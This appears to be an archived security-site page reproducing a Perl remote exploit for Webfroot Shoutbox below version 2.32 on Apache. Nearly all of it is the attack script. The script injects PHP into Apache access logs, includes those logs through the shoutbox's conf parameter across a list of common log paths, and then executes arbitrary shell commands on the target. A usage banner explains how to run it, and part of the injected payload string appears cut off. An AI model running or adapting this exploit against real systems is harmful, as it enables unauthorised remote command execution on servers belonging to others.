K-Otik Security : Webfroot Shoutbox < 2.32 on Apache remote Exploit

Webfroot Shoutbox < 2.32 on Apache remote Exploit

     * Version TXT Disponible ici *

                              #!/usr/bin/perl
                              #
                              # Webfroot Shoutbox < 2.32 on apache exploit
                              #

                              use IO::Socket;

                              my $host = "127.0.0.1";
                              my $port = 80;
                              my $shoutbox = "shoutbox.php?conf=";
                              my $shoutboxpath = "/shoutbox";
                              my $cmd = "ls -l";
                              my $conn;
                              my $type;
                              my @logs = ( 
                              "/etc/httpd/logs/acces_log",
                              "/etc/httpd/logs/acces.log",
                              "/var/www/logs/access_log",
                              "/var/www/logs/access.log",
                              "/usr/local/apache/logs/access_log",
                              "/usr/local/apache/logs/access.log",
                              "/var/log/apache/access_log",
                              "/var/log/apache/access.log",
                              "/var/log/httpd/access_log",
                              "/var/log/httpd/access.log",
                              #"D:/apps/Apache Group/Apache2/logs/access.log" 
                              );

                              my $qinit = "GET /

');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n"; my $conn; if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){ $type = $ARGV[0]; } else { print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\n"; print "Usage: \n Webfroot.pl (x|r) host [command] [path] [port]\n"; print "\ttype\tx = exploit | r = run command (after run with x option)\n"; print "\thost\thostname\n"; print "\tcommand\tcommand to execute on remote server\n"; print "\tpath\tpath to shoutbox installation ex: /shoutbox\n"; print "\tport\tport number\n"; exit; } if ($ARGV[1]){ $host = $ARGV[1]; } if ($ARGV[2]){ $cmd = $ARGV[2]; } if ($ARGV[3]){ $shoutboxpath = $ARGV[3]; } if ($ARGV[4]){ $port = int($ARGV[4]); } $cmd =~ s/ /+/g; sub connect_to { #print "[x] Connect to $host on port $port ...\n"; $conn = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port", ) or die "[*] Can't connect to $host on port $port ...\n"; $conn-> autoflush(1); } sub connect_end { #print "[x] Close connection\n"; close($conn); } sub exploit { my $access_log = $_[0]; my $result = ""; $access_log =~ s/ /+/g; my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\ nHost: $host\nConnection: Close\n\n"; print "$query"; print "[x] Access log : ", $access_log ,"\n"; &connect_to; print $conn $query; while ($line = <$conn>) { $result = $line; #print $result; }; &connect_end; } sub run_cmd { my $conf="/tmp/.ex"; #my $conf="d:/tmp/.ex"; my $result = ""; my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\ nHost: $host\nConnection: Close\n\n"; print "[x] Run command ...\n"; &connect_to; print $conn $query; while ($line = <$conn>) { $result .= $line; }; &connect_end; if ($result =~ /Result:/){ print $result; } else { print $result; print "[*] Failed ..."; } } sub insert_code { my $result = ""; print "[x] Access log : ", $access_log ,"\n"; print "[x] Insert php code into apache access log ...\n"; &connect_to; print $conn "$qinit"; while ($line = <$conn>) { $result .= $line; }; &connect_end; print $result; } if ($type eq "x"){ &insert_code; print "[x] Trying to exploit ...\n"; for ($i = 0;$i <= $#logs; $i++){ &exploit($logs[$i]); } &run_cmd; } else { &run_cmd; }